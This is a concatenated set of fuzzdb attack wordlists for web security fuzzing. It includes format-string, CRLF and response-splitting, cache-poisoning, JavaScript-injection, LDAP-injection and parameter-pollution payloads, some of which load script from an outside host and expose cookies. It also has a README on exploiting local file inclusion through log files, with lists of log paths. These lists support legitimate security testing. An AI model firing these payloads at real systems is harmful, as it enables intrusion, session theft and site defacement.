-------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filenames-microsoft.txt: -------------------------------------------------------------------------------- 1 | A: 2 | ZZ: 3 | CON 4 | PRN 5 | AUX 6 | CLOCK$ 7 | NUL 8 | COM1 9 | COM2 10 | COM3 11 | COM4 12 | COM5 13 | COM6 14 | COM7 15 | COM8 16 | COM9 17 | LPT1 18 | LPT2 19 | LPT3 20 | LPT4 21 | LPT5 22 | LPT6 23 | LPT7 24 | LPT8 25 | LPT9 26 | * 27 | " 28 | [ 29 | ] 30 | : 31 | | 32 | = 33 | , 34 | CON.{EXT} 35 | PRN.{EXT} 36 | AUX.{EXT} 37 | CLOCK$.{EXT} 38 | NUL.{EXT} 39 | COM1.{EXT} 40 | COM2.{EXT} 41 | COM3.{EXT} 42 | COM4.{EXT} 43 | COM5.{EXT} 44 | COM6.{EXT} 45 | COM7.{EXT} 46 | COM8.{EXT} 47 | COM9.{EXT} 48 | LPT1.{EXT} 49 | LPT2.{EXT} 50 | LPT3.{EXT} 51 | LPT4.{EXT} 52 | LPT5.{EXT} 53 | LPT6.{EXT} 54 | LPT7.{EXT} 55 | LPT8.{EXT} 56 | LPT9.{EXT} 57 | *.{EXT} 58 | ".{EXT} 59 | [.{EXT} 60 | ].{EXT} 61 | :.{EXT} 62 | |.{EXT} 63 | =.{EXT} 64 | ,.{EXT} 65 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filesystem-chars-microsoft.txt: -------------------------------------------------------------------------------- 1 | * 2 | . 3 | " 4 | / 5 | \ 6 | [ 7 | ] 8 | : 9 | ; 10 | | 11 | = 12 | , 13 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/invalid-filesystem-chars-osx.txt: -------------------------------------------------------------------------------- 1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 
2 | # fuzz these into a filename during upload attempts 3 | : 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-LF-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | 3 | -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/eicar.com.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/uber.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/uber.gif -------------------------------------------------------------------------------- /fuzzdb/attack/file-upload/malicious-images/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/file-upload/malicious-images/xssproject.swf -------------------------------------------------------------------------------- /fuzzdb/attack/format-strings/format-strings.txt: -------------------------------------------------------------------------------- 1 | %s%p%x%d 2 | %p%p%p%p 3 | %x%x%x%x 4 | %d%d%d%d 5 | %s%s%s%s 6 | %99999999999s 7 | %08x 8 | %20d 9 | %20n 10 | %20x 11 | %20s 12 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 13 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 14 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 15 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 16 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 17 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 18 | 
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 19 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 20 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 21 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 22 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 23 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 24 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 25 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 26 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 27 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 28 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 29 | XXXXX.%p 30 | XXXXX`perl -e 'print ".%p" x 80'` 31 | `perl -e 'print ".%p" x 80'`%n 32 | %08x.%08x.%08x.%08x.%08x\n 33 | XXX0_%08x.%08x.%08x.%08x.%08x\n 34 | %.16705u%2\$hn 35 | \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| 36 | AAAAA%c 37 | AAAAA%d 38 | AAAAA%e 39 | AAAAA%f 40 | AAAAA%I 41 | AAAAA%o 42 | AAAAA%p 43 | AAAAA%s 44 | AAAAA%x 45 | AAAAA%n 46 | ppppp%c 47 | ppppp%d 48 | ppppp%e 49 | ppppp%f 50 | ppppp%I 51 | ppppp%o 52 | ppppp%p 53 | ppppp%s 54 | ppppp%x 55 | ppppp%n 56 | %@ 57 | %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ 58 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/html_attributes.txt: 
-------------------------------------------------------------------------------- 1 | accept 2 | accept-charset 3 | accesskey 4 | action 5 | align 6 | alt 7 | async 8 | autocomplete 9 | autofocus 10 | autoplay 11 | bgcolor 12 | border 13 | challenge 14 | charset 15 | checked 16 | cite 17 | class 18 | color 19 | cols 20 | colspan 21 | content 22 | contenteditable 23 | contextmenu 24 | controls 25 | coords 26 | data 27 | data-userdefined-attribute 28 | datetime 29 | default 30 | defer 31 | dir 32 | dirname 33 | disabled 34 | download 35 | draggable 36 | dropzone 37 | enctype 38 | for 39 | form 40 | formaction 41 | headers 42 | height 43 | hidden 44 | high 45 | href 46 | hreflang 47 | http-equiv 48 | id 49 | ismap 50 | keytype 51 | kind 52 | label 53 | lang 54 | list 55 | loop 56 | low 57 | manifest 58 | max 59 | maxlength 60 | media 61 | method 62 | min 63 | multiple 64 | muted 65 | name 66 | novalidate 67 | onabort 68 | onafterprint 69 | onbeforeprint 70 | onbeforeunload 71 | onblur 72 | oncanplay 73 | oncanplaythrough 74 | onchange 75 | onclick 76 | oncontextmenu 77 | oncopy 78 | oncuechange 79 | oncut 80 | ondblclick 81 | ondrag 82 | ondragend 83 | ondragenter 84 | ondragleave 85 | ondragover 86 | ondragstart 87 | ondrop 88 | ondurationchange 89 | onemptied 90 | onended 91 | onerror 92 | onfocus 93 | onhashchange 94 | oninput 95 | oninvalid 96 | onkeydown 97 | onkeypress 98 | onkeyup 99 | onload 100 | onloadeddata 101 | onloadedmetadata 102 | onloadstart 103 | onmessage 104 | onmousedown 105 | onmousemove 106 | onmouseout 107 | onmouseover 108 | onmouseup 109 | onmousewheel 110 | onoffline 111 | ononline 112 | onpagehide 113 | onpageshow 114 | onpaste 115 | onpause 116 | onplay 117 | onplaying 118 | onpopstate 119 | onprogress 120 | onratechange 121 | onreset 122 | onresize 123 | onscroll 124 | onsearch 125 | onseeked 126 | onseeking 127 | onselect 128 | onshow 129 | onstalled 130 | onstorage 131 | onsubmit 132 | onsuspend 133 | ontimeupdate 134 | ontoggle 135 | 
onunload 136 | onvolumechange 137 | onwaiting 138 | onwheel 139 | open 140 | optimum 141 | pattern 142 | placeholder 143 | poster 144 | preload 145 | readonly 146 | rel 147 | required 148 | reversed 149 | rows 150 | rowspan 151 | sandbox 152 | scope 153 | scoped 154 | selected 155 | shape 156 | size 157 | sizes 158 | span 159 | spellcheck 160 | src 161 | srcdoc 162 | srclang 163 | start 164 | step 165 | style 166 | tabindex 167 | target 168 | title 169 | translate 170 | type 171 | usemap 172 | value 173 | width 174 | wrap 175 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/html_tags.txt: -------------------------------------------------------------------------------- 1 | !-- -- 2 | !DOCTYPE 3 | a 4 | abbr 5 | acronym 6 | address 7 | applet 8 | area 9 | article 10 | aside 11 | audio 12 | b 13 | base 14 | basefont 15 | bdi 16 | bdo 17 | big 18 | blockquote 19 | body 20 | br 21 | button 22 | canvas 23 | caption 24 | center 25 | cite 26 | code 27 | col 28 | colgroup 29 | datalist 30 | dd 31 | del 32 | details 33 | dfn 34 | dialog 35 | dir 36 | div 37 | dl 38 | dt 39 | em 40 | embed 41 | fieldset 42 | figcaption 43 | figure 44 | font 45 | footer 46 | form 47 | frame 48 | frameset 49 | h1 50 | h2 51 | h3 52 | h4 53 | h5 54 | h6 55 | head 56 | header 57 | hr 58 | html 59 | i 60 | iframe 61 | img 62 | input 63 | ins 64 | kbd 65 | keygen 66 | label 67 | legend 68 | li 69 | link 70 | main 71 | map 72 | mark 73 | menu 74 | menuitem 75 | meta 76 | meter 77 | nav 78 | noframes 79 | noscript 80 | object 81 | ol 82 | optgroup 83 | option 84 | output 85 | p 86 | param 87 | pre 88 | progress 89 | q 90 | rp 91 | rt 92 | ruby 93 | s 94 | samp 95 | script 96 | section 97 | select 98 | small 99 | source 100 | span 101 | strike 102 | strong 103 | style 104 | sub 105 | summary 106 | sup 107 | table 108 | tbody 109 | td 110 | textarea 111 | tfoot 112 | th 113 | thead 114 | time 115 | title 116 | tr 117 | track 118 | tt 119 | u 
120 | ul 121 | var 122 | video 123 | wbr 124 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/javascript_events.txt: -------------------------------------------------------------------------------- 1 | onafterprint 2 | onbeforeprint 3 | onbeforeonload 4 | onblur 5 | onerror 6 | onfocus 7 | onhaschange 8 | onload 9 | onmessage 10 | onoffline 11 | ononline 12 | onpagehide 13 | onpageshow 14 | onpopstate 15 | onredo 16 | onresize 17 | onstorage 18 | onundo 19 | onunload 20 | onblur 21 | onchange 22 | oncontextmenu 23 | onfocus 24 | onformchange 25 | onforminput 26 | oninput 27 | oninvalid 28 | onreset 29 | onselect 30 | onsubmit 31 | onkeydown 32 | onkeypress 33 | onkeyup 34 | onclick 35 | ondblclick 36 | ondrag 37 | ondragend 38 | ondragenter 39 | ondragleave 40 | ondragover 41 | ondragstart 42 | ondrop 43 | onmousedown 44 | onmousemove 45 | onmouseout 46 | onmouseover 47 | onmouseup 48 | onmousewheel 49 | onscroll 50 | onabort 51 | oncanplay 52 | oncanplaythrough 53 | ondurationchange 54 | onemptied 55 | onended 56 | onerror 57 | onloadeddata 58 | onloadedmetadata 59 | onloadedstart 60 | onpause 61 | onplay 62 | onplaying 63 | onprogress 64 | onratechange 65 | onreadystatechange 66 | onseeked 67 | onseeking 68 | onstalled 69 | onsuspend 70 | ontimeupdate 71 | onvolumechange 72 | onwaiting 73 | style 74 | 75 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/js_inject.txt: -------------------------------------------------------------------------------- 1 | function(){ return this.userid} 2 | ' function(){ return this.username} or '1'='1 3 | function(){return version()} 4 | function(){return version} 5 | t'; return this; var d='! 6 | " function(){ return this} or '1'='1 7 | t"; return this; var d='! 
8 | ' || this || '1'=='1 9 | ' || this.version || '1'=='1 10 | ' || '1'=='1 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/html_js_fuzz/quotationmarks.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | '' 4 | "" 5 | '"' 6 | "''''"'" 7 | "'"'"''''" 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/README.md: -------------------------------------------------------------------------------- 1 | References: 2 | 3 | http://ha.ckers.org/response-splitting.html 4 | 5 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/crlf-injection.txt: -------------------------------------------------------------------------------- 1 | %0d%0a 2 | %0d%0a%0d%0a 3 | r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0aInjected%02Content 4 | %0d%0d%0a%0a 5 | 0x0D0x0A 6 | 0x0D0x0D0x0A0x0A 7 | \r\n 8 | %5cr%5cn 9 | %0%0d%0ad%0%0d%0aa 10 | %0%0D%0AD%0%0D%0AA 11 | %0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4 12 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 13 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 14 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com 15 | %0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E 16 | %0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E 17 | %22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22 18 | 
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 19 | %0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E 20 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/docs.http-method-defs.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/http-protocol/docs.http-method-defs.html -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/hpp.txt: -------------------------------------------------------------------------------- 1 | # HTTP paramter polution and interpretation payloads by Jacco van Tuijl 2 | ?id=id=1 3 | &id=1?id=2 4 | ?id['&id=1']=2 5 | ?id[1&id=2]=1 6 | ?id=1&id=2 7 | &id=1&id=2 8 | ?id=1%26id%3D2 9 | ?id&id=1 10 | ????id=1 11 | &&&&id=1 12 | ?id=id['1']=2 13 | ?id=1#id=2 14 | ?id==1 15 | ?id===1 16 | ;id=1?id=2 17 | ?id;id=1 18 | &id=1;id=2 19 | #id=1?id=2&id=3 20 | ?id=1,2 21 | ?id1,id2=1 22 | ?id[=1&id=2]=3 23 | ?id[&id=2]=1 24 | ?id=[1,2] 25 | ?id&=1 26 | ?id[]=1&id=2 27 | ?id=/:@&=+$&id=2 28 | ?id[=/:@&=+$&id=2]=1 29 | ?id={id:{id:1},2} 30 | ?id[{id:{id[]:1},2}]=3 31 | ?id=%23?id=1 32 | ?id=1%26id=2 33 | ?id=1%2526id=2 34 | ?id=1%c0%a6id=2 35 | ?id=1\uc0a6id=2 36 | ?id=1&id=2 37 | ?id=1&id=2 38 | ?id=1%u0026;id=2 -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-header-cache-poison.txt: -------------------------------------------------------------------------------- 1 | # Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010) 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/ 3 | # projurl 4 | GET 
http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1 5 | %0d%0aX-Injection-Header:%20AttackValue 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-protocol-methods.txt: -------------------------------------------------------------------------------- 1 | OPTIONS 2 | GET 3 | HEAD 4 | POST 5 | PUT 6 | DELETE 7 | TRACE 8 | TRACK 9 | CONNECT 10 | PROPFIND 11 | PROPPATCH 12 | MKCOL 13 | COPY 14 | MOVE 15 | LOCK 16 | UNLOCK 17 | VERSION-CONTROL 18 | REPORT 19 | CHECKOUT 20 | CHECKIN 21 | UNCHECKOUT 22 | MKWORKSPACE 23 | UPDATE 24 | LABEL 25 | MERGE 26 | BASELINE-CONTROL 27 | MKACTIVITY 28 | ORDERPATCH 29 | ACL 30 | PATCH 31 | SEARCH 32 | ARBITRARY 33 | BCOPY 34 | BDELETE 35 | BMOVE 36 | BPROPFIND 37 | BPROPPATCH 38 | DEBUG 39 | INDEX 40 | NOTIFY 41 | POLL 42 | RPC_IN_DATA 43 | RPC_OUT_DATA 44 | SUBSCRIBE 45 | UNSUBSCRIBE 46 | X-MS-ENUMATTS 47 | -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-request-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Accept 2 | Accept-Charset 3 | Accept-Encoding 4 | Accept-Language 5 | Accept-Datetime 6 | Authorization 7 | Cache-Control 8 | Connection 9 | Cookie 10 | Content-Length 11 | Content-MD5 12 | Content-Type 13 | Date 14 | Expect 15 | From 16 | Host 17 | If-Match 18 | If-Modified-Since 19 | If-None-Match 20 | If-Range 21 | If-Unmodified-Since 22 | Max-Forwards 23 | Origin 24 | Pragma 25 | Proxy-Authorization 26 | 
Range 27 | Referer 28 | TE 29 | User-Agent 30 | Upgrade 31 | Via 32 | Warning 33 | X-Requested-With 34 | DNT 35 | X-Forwarded-For 36 | X-Forwarded-Host 37 | X-Forwarded-Proto 38 | Front-End-Https 39 | X-Http-Method-Override 40 | X-ATT-DeviceId 41 | X-Wap-Profile 42 | Proxy-Connection -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/http-response-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Accept-Ranges 3 | Age 4 | Allow 5 | Cache-Control 6 | Connection 7 | Content-Encoding 8 | Content-Language 9 | Content-Length 10 | Content-Location 11 | Content-MD5 12 | Content-Disposition 13 | Content-Range 14 | Content-Type 15 | Date 16 | ETag 17 | Expires 18 | Last-Modified 19 | Link 20 | Location 21 | P3P 22 | Pragma 23 | Proxy-Authenticate 24 | Refresh 25 | Retry-After 26 | Server 27 | Set-Cookie 28 | Status 29 | Strict-Transport-Security 30 | Trailer 31 | Transfer-Encoding 32 | Upgrade 33 | Vary 34 | Via 35 | Warning 36 | WWW-Authenticate 37 | X-Frame-Options 38 | Public-Key-Pins 39 | X-XSS-Protection 40 | Content-Security-Policy 41 | X-Content-Security-Policy 42 | X-WebKit-CSP 43 | X-Content-Type-Options 44 | X-Powered-By 45 | X-UA-Compatible -------------------------------------------------------------------------------- /fuzzdb/attack/http-protocol/known-uri-types.txt: -------------------------------------------------------------------------------- 1 | aaa: 2 | aaas: 3 | about: 4 | acap: 5 | adiumxtra: 6 | afp: 7 | aim: 8 | apt: 9 | aw: 10 | beshare: 11 | bitcoin: 12 | bolo: 13 | callto: 14 | cap: 15 | chrome: 16 | cid: 17 | coap: 18 | content: 19 | crid: 20 | cvs: 21 | data: 22 | dav: 23 | dict: 24 | dns: 25 | doi: 26 | ed2k: 27 | facetime: 28 | fax: 29 | feed: 30 | file: 31 | finger: 32 | fish: 33 | ftp: 34 | geo: 35 | gg: 36 | git: 37 | gizmoproject: 38 | go: 39 | gopher: 40 | gtalk: 41 | h323: 42 | http: 43 | 
https: 44 | iax: 45 | icap: 46 | im: 47 | imap: 48 | info: 49 | ipp: 50 | irc: 51 | irc6: 52 | ircs: 53 | iris.beep: 54 | iris.lws: 55 | iris.xpcs: 56 | iris.xpc: 57 | iris: 58 | itms: 59 | jar: 60 | javascript: 61 | keyparc: 62 | lastfm: 63 | ldap: 64 | ldaps: 65 | lsid: 66 | magnet: 67 | mailto: 68 | maps: 69 | market: 70 | message: 71 | mid: 72 | mms: 73 | modem: 74 | msnim: 75 | msrps: 76 | msrp: 77 | mtqp: 78 | mumble: 79 | mupdate: 80 | mvn: 81 | news: 82 | nfs: 83 | nntp: 84 | notes: 85 | opaquelocktoken: 86 | palm: 87 | paparazzi: 88 | platform: 89 | pop: 90 | pres: 91 | prospero: 92 | proxy: 93 | psyc: 94 | query: 95 | rmi: 96 | rsync: 97 | rtmp: 98 | rtsp: 99 | secondlife: 100 | service: 101 | sftp: 102 | sgn: 103 | shttp: 104 | sieve: 105 | sip: 106 | sips: 107 | skype: 108 | smb: 109 | sms: 110 | snmp: 111 | soap.beeps: 112 | soap.beep: 113 | soldat: 114 | spotify: 115 | ssh: 116 | steam: 117 | svn: 118 | tag: 119 | teamspeak: 120 | tel: 121 | telnet: 122 | tftp: 123 | things: 124 | thismessage: 125 | tip: 126 | tv: 127 | udp: 128 | unreal: 129 | urn: 130 | ut2004: 131 | uuid: 132 | vemmi: 133 | ventrilo: 134 | view-source: 135 | wais: 136 | webcal: 137 | wss: 138 | ws: 139 | wtai: 140 | wyciwyg: 141 | xfire: 142 | xmlrpc.beeps: 143 | xmlrpc.beep : 144 | xmpp: 145 | xri: 146 | ymsgr: 147 | z39.50r: 148 | z39.50s: 149 | -------------------------------------------------------------------------------- /fuzzdb/attack/integer-overflow/integer-overflows.txt: -------------------------------------------------------------------------------- 1 | -1 2 | 0 3 | 0x100 4 | 0x1000 5 | 0x3fffffff 6 | 0x7ffffffe 7 | 0x7fffffff 8 | 0x80000000 9 | 0xfffffffe 10 | 0xffffffff 11 | 0x10000 12 | 0x100000 13 | -------------------------------------------------------------------------------- /fuzzdb/attack/ip/localhost.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | 127.0.0.2 3 | 127.1 4 | 127.2 5 | ::1 6 | 0:0:0:0:0:0:0:1 7 
| 0:0:0:000:0:0:0:1 8 | 0000:0000:0000:0000:0000:0000:0000:0001 9 | 2130706433 10 | 2130706434 11 | 7F000001 12 | 7F000002 13 | localhost 14 | -------------------------------------------------------------------------------- /fuzzdb/attack/ldap/README.md: -------------------------------------------------------------------------------- 1 | tool: 2 | http://code.google.com/p/ldap-blind-explorer/ 3 | 4 | video: 5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/ldap/ldap-injection.txt: -------------------------------------------------------------------------------- 1 | ! 2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | \21 11 | \26 12 | \28 13 | \29 14 | & 15 | ( 16 | ) 17 | * 18 | *()|%26' 19 | *()|&' 20 | *(|(mail=*)) 21 | *(|(objectclass=*)) 22 | *)(uid=*))(|(uid=* 23 | (*)*) 24 | *)* 25 | */* 26 | *| 27 | / 28 | // 29 | //* 30 | @* 31 | | 32 | admin* 33 | admin*)((|userpassword=*) 34 | admin*)((|userPassword=*) 35 | x' or name()='username' or 'x'='y 36 | -------------------------------------------------------------------------------- /fuzzdb/attack/lfi/README.md: -------------------------------------------------------------------------------- 1 | LFI - Local File Include attacks 2 | 3 | To exploit an LFI bug, you need to be able to write code to a local file and call it from the include. HTTPD log files are a location that is typically writable. 4 | 5 | common-unix-httpd-log-locations.fuzz.txt 6 | * To exploit a lfi bug, you have to get code into a local file. This list contains a list of common unix logfile locations based on common packages formats. 7 | 8 | common-windows-httpd-log-locations.fuzz.txt 9 | * To exploit a lfi bug, you have to get code into a local file. 
This list contains common Windows logfile locations, based on common package formats. 10 | 11 | JHADDIX_LFI.txt 12 | This file contains many common locations you might have write access to. It is not meant to be fuzzed as-is; instead, extract the applicable parts, create any possible variants, and use a customized list when hunting for a way to include it. 13 | 14 | For more details: 15 | * https://github.com/fuzzdb-project/fuzzdb/blob/master/docs/misc/Web-Shells-rev2.pdf 16 | 17 | other tools: 18 | * fimap https://tha-imax.de/git/root/fimap 19 | * how-to http://kaoticcreations.blogspot.com/2011/08/automated-lfirfi-scanning-exploiting.html 20 | 21 | 22 | -------------------------------------------------------------------------------- /fuzzdb/attack/lfi/common-ms-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | \Program Files\Apache Group\Apache\logs\access.log 2 | \Program Files\Apache Group\Apache\logs\error.log 3 | \Program Files\Apache Group\Apache\conf\httpd.conf 4 | \Program Files\Apache Group\Apache2\conf\httpd.conf 5 | \Program Files (x86)\Apache Group\Apache\logs\access.log 6 | \Program Files (x86)\Apache Group\Apache\logs\error.log 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | /apache/logs/error.log 2 | /apache/logs/access.log 3 | /apache/logs/error.log 4 | /apache/logs/access.log 5 | /apache/logs/error.log 6 | /apache/logs/access.log 7 | /etc/httpd/logs/acces_log 8 | /etc/httpd/logs/acces.log 9 | /etc/httpd/logs/error_log 10 | /etc/httpd/logs/error.log 11 | /var/www/logs/access_log 12 | /var/www/logs/access.log 13 | /usr/local/apache/logs/access_log 14 | /usr/local/apache/logs/access.log 15 | /var/log/apache/access_log 16 | /var/log/apache2/access_log 17 | /var/log/apache/access.log 18 | /var/log/apache2/access.log 19 | 
